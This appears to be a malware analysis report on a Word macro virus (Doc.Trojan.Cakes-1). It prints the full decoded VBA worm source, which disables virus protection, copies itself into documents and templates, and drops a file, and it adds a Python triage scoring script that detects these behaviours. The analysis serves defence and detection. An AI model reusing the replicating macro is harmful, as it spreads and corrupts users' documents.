Verdict: MALICIOUS
Risk Score: 140
Malware Insights
MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1562.001 Impair Defenses: Disable or Modify Tools (the macros set Options.VirusProtection = False; nothing in the sample touches the Mark-of-the-Web, so the earlier T1553.005 mapping is not supported by the evidence)
The sample is a Word document carrying a VBA project (module streams ThisDocument and L_) whose entry points are the legacy WordBasic auto-execution names AutoExec, AutoOpen and AutoNew. AutoOpen and AutoExec set Options.VirusProtection = False, which switches off Word's macro virus protection prompt; AutoOpen then uses Application.OrganizerCopy to copy the L_ module into the active document and into every loaded template (the Normal template included) and saves each of them, which is the replication mechanism of a classic macro virus. AutoExec appends a random number to C:\WINDOWS\MAJORANA.E and schedules a payload with Application.OnTime every 50 minutes (the Refresh constant): within two days of 28 March (the constant "28/3/" plus the current year, parsed by DateValue, so the trigger depends on the date locale) it shows a "Hello! This is time of cakes." message box, otherwise it repeatedly types " Ettore Majorana (1906-1938?) " into the current selection. The visible code contains no network activity, downloader or exploit; the impact is self-replication across documents and templates plus document corruption. The ClamAV signature Doc.Trojan.Cakes-1 matches this family.
Heuristics (4)
- critical CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Trojan.Cakes-1
- medium OLE_VBA_MACROS: Document contains VBA macro code (1 related finding)
- high OLE_VBA_AUTOOPEN: AutoOpen macro present
- medium OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. On its own this is analyst-facing evidence for the old Word macro execution surface, not a downloader or parser-CVE attribution. The heuristic's generic description states that no modern VBA project was recovered; for this sample that does not hold, since a full VBA project was decoded (see Extracted artifacts), so the marker corroborates the VBA findings rather than standing alone.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9291 bytes | 5524b02b1672335179bd4026fcfd8e9fc2a93b261d92fd0abd9a615890094578 |

Preview: first 1,000 lines of the extracted script. The two decoded module streams are concatenated; the p-code disassembly appended after the source is analyzer output and is truncated.
```vba
' ---- Module stream Macros/VBA/ThisDocument (document class module, no code) ----
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' ---- Module stream Macros/VBA/L_ (the worm body; "L_" is also the name it copies itself under) ----
Attribute VB_Name = "L_"
'V1.1
'4/10/97
'MJRN-MF-TA
Const Refresh = "00:50:00"   ' payload re-arm interval for Application.OnTime
Const Boom = "28/3/"         ' trigger date prefix, completed with the current year
' AutoNew: fires when a new document is created from an infected template.
' Note it sets VirusProtection = True, unlike AutoOpen/AutoExec below.
Sub AutoNew()
Options.VirusProtection = True
On Error Resume Next
Application.OrganizerCopy _
Source:=ThisDocument.FullName, _
Destination:=ActiveDocument.FullName, _
Name:="L_", _
Object:=wdOrganizerObjectProjectItems
For Each d In Templates
If (ThisDocument.FullName <> d.FullName) Then
Application.OrganizerDelete _
Source:=d.FullName, _
Name:="L_", Object:=wdOrganizerObjectProjectItems
Application.OrganizerCopy _
Source:=ThisDocument.FullName, _
Destination:=d.FullName, _
Name:="L_", _
Object:=wdOrganizerObjectProjectItems
d.Save
End If
Next d
End Sub
' AutoOpen: disables Word's macro virus protection prompt, then replaces/copies
' module L_ into the opened document and into every loaded template, saving each.
Sub AutoOpen()
Options.VirusProtection = False
On Error Resume Next
If (ThisDocument.FullName <> ActiveDocument.FullName) Then
Application.OrganizerDelete _
Source:=ActiveDocument.FullName, _
Name:="L_", Object:=wdOrganizerObjectProjectItems
Application.OrganizerCopy _
Source:=ThisDocument.FullName, _
Destination:=ActiveDocument.FullName, _
Name:="L_", _
Object:=wdOrganizerObjectProjectItems
ActiveDocument.Save
End If
For Each d In Templates
If (ThisDocument.FullName <> d.FullName) Then
Application.OrganizerDelete _
Source:=d.FullName, _
Name:="L_", Object:=wdOrganizerObjectProjectItems
Application.OrganizerCopy _
Source:=ThisDocument.FullName, _
Destination:=d.FullName, _
Name:="L_", _
Object:=wdOrganizerObjectProjectItems
d.Save
End If
Next d
End Sub
' AutoExec: runs at Word start-up once the Normal template is infected.
' Appends a random number to a marker file, then schedules one of two payloads.
Sub AutoExec()
Options.VirusProtection = False
On Error Resume Next
Dim f As Integer
f = FreeFile
Dim c As Integer
Open "C:\WINDOWS\MAJORANA.E" For Append As f Len = Len(c)
c = Rnd * 1000
Write #f, c
Close f
Dim v As Date
v = DateValue(Boom & Year(Now))   ' "28/3/<year>": 28 March in day/month locales
If (Date >= v) And (Date <= v + 2) Then
Application.OnTime when:=Now + TimeValue(Refresh), Name:="L_.effetto"
Else
Application.OnTime when:=Now + TimeValue(Refresh), Name:="L_.effetto2"
End If
End Sub
' Payload in the trigger window: the message box the ClamAV signature is named after.
Sub effetto()
On Error Resume Next
v = MsgBox("Hello! This is time of cakes.", , "Hello?")
End Sub
' Payload outside the window: inserts text at the cursor and re-arms itself every 50 minutes.
Sub effetto2()
On Error Resume Next
s = " Ettore Majorana (1906-1938?) "
Selection.TypeText Text:=s
Application.OnTime when:=Now + TimeValue(Refresh), Name:="L_.effetto2"
End Sub
' Processing file: /opt/analyzer/scan_staging/754945aac2894d6b9d16bc05dcffb7bc.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 903 bytes
' Macros/VBA/L_ - 4253 bytes
' Line #0:
' QuoteRem 0x0000 0x0004 "V1.1"
' Line #1:
' QuoteRem 0x0000 0x0007 "4/10/97"
' Line #2:
' QuoteRem 0x0000 0x000A "MJRN-MF-TA"
' Line #3:
' Dim (Const)
' LitStr 0x0008 "00:50:00"
' VarDefn Refresh
' Line #4:
' Dim (Const)
' LitStr 0x0005 "28/3/"
' VarDefn Boom
' Line #5:
' FuncDefn (Sub AutoNew())
' Line #6:
' LitVarSpecial (True)
' Ld Options
' MemSt VirusProtection
' Line #7:
' OnError (Resume Next)
' Line #8:
' LineCont 0x0010 03 00 0C 00 09 00 0C 00 0F 00 0C 00 13 00 0C 00
' Ld ThisDocument
' MemLd FullName
' ParamNamed Source
' Ld ActiveDocument
' MemLd Full
' ... (truncated)
```
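The heuristics above fire on the same handful of behaviours that the extracted source shows: an auto-exec entry point, Options.VirusProtection switched off, OrganizerCopy replication into other documents and templates, a file drop and OnTime scheduling. The script below is an added example written for this report, not the analyzer's code and not part of the sample; it takes the kind of VBA dump olevba produces, splits it into modules on the Attribute VB_Name lines, and scores those behaviours. The indicator weights and verdict thresholds are assumptions of the example, the embedded sample is a trimmed excerpt of the macro printed above, and the benign control macro is constructed for contrast.

```python
"""Triage scoring for VBA source dumped by oletools' olevba (added example;
not the analyzer's code). Scores Word auto-exec entry points, switching
Options.VirusProtection off, self-replication via Application.OrganizerCopy,
file drops and Application.OnTime scheduling. Weights/thresholds are assumed."""
import json
import re

# Auto-execution entry points: legacy WordBasic names plus the VBA document
# events that replaced them; the procedure name is captured.
AUTO_EXEC = re.compile(
    r"^\s*(?:Public\s+|Private\s+)?Sub\s+"
    r"(Auto(?:Exec|Open|New|Close|Exit)|Document_(?:Open|New|Close))\s*\(",
    re.IGNORECASE | re.MULTILINE)

# (indicator, weight, pattern): each indicator is weighted once however often it
# appears; the hit count is still reported for the analyst.
INDICATORS = [
    ("virus_protection_off", 40,
     re.compile(r"Options\.VirusProtection\s*=\s*False", re.I)),
    ("organizer_copy_self", 40,   # copies a module out of this document ...
     re.compile(r"Application\.OrganizerCopy\b[\s\S]{0,200}?"
                r"Source:=ThisDocument\.FullName", re.I)),
    ("template_iteration", 15,    # ... into every loaded template
     re.compile(r"For\s+Each\s+\w+\s+In\s+Templates", re.I)),
    ("file_drop", 10,
     re.compile(r'^\s*Open\s+"[^"]+"\s+For\s+(?:Output|Append|Binary)', re.I | re.M)),
    ("ontime_scheduling", 10,
     re.compile(r"Application\.OnTime\b", re.I)),
]

# Trimmed excerpt of the macro extracted from the sample (AutoNew and the
# payload subs omitted); kept as a raw string so the Windows path is literal.
SAMPLE_VBA = r'''Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Name = "L_"
Const Refresh = "00:50:00"
Sub AutoOpen()
Options.VirusProtection = False
On Error Resume Next
For Each d In Templates
If (ThisDocument.FullName <> d.FullName) Then
Application.OrganizerCopy _
Source:=ThisDocument.FullName, _
Destination:=d.FullName, _
Name:="L_", Object:=wdOrganizerObjectProjectItems
d.Save
End If
Next d
End Sub
Sub AutoExec()
Options.VirusProtection = False
Dim f As Integer
f = FreeFile
Open "C:\WINDOWS\MAJORANA.E" For Append As f
Close f
Application.OnTime when:=Now + TimeValue(Refresh), Name:="L_.effetto2"
End Sub
'''

# Constructed benign control: a macro with no auto-exec and no indicators.
BENIGN_VBA = r'''Attribute VB_Name = "Module1"
Sub FormatReport()
    Selection.Font.Bold = True
End Sub
'''


def split_modules(vba_source):
    """Split an olevba dump into {module_name: source}; olevba starts each
    decoded module stream with its own 'Attribute VB_Name = "..."' line."""
    modules, name, buf = {}, None, []
    for line in vba_source.splitlines():
        m = re.match(r'\s*Attribute\s+VB_Name\s*=\s*"([^"]+)"', line)
        if m:
            if name is not None:
                modules[name] = "\n".join(buf)
            name, buf = m.group(1), []
            continue
        name = name or "<unnamed>"
        buf.append(line)
    if name is not None:
        modules[name] = "\n".join(buf)
    return modules


def triage(vba_source):
    """Return auto-exec entry points, indicator hit counts, a score and a verdict."""
    modules = split_modules(vba_source)
    result = {"modules": list(modules), "auto_exec": [], "indicators": {}, "score": 0}
    for mod, src in modules.items():
        result["auto_exec"] += [f"{mod}.{m.group(1)}" for m in AUTO_EXEC.finditer(src)]
    for name, weight, rx in INDICATORS:
        hits = len(rx.findall(vba_source))
        if hits:
            result["indicators"][name] = hits
            result["score"] += weight
    # Indicators only execute if an auto-exec entry point triggers them.
    if result["auto_exec"]:
        result["score"] += 20
    result["verdict"] = ("malicious" if result["score"] >= 80
                         else "suspicious" if result["score"] >= 40 else "clean")
    return result


if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_VBA), indent=2))
    print(json.dumps(triage(BENIGN_VBA), indent=2))
```

Run it directly to see both verdicts; on the excerpt it reports L_.AutoOpen and L_.AutoExec as entry points, two VirusProtection toggles and one OrganizerCopy of ThisDocument, and scores it malicious, while the control macro scores zero. The organizer_copy_self pattern deliberately requires Source:=ThisDocument.FullName within a short window after OrganizerCopy, so legitimate OrganizerCopy calls that import from another template do not trip it.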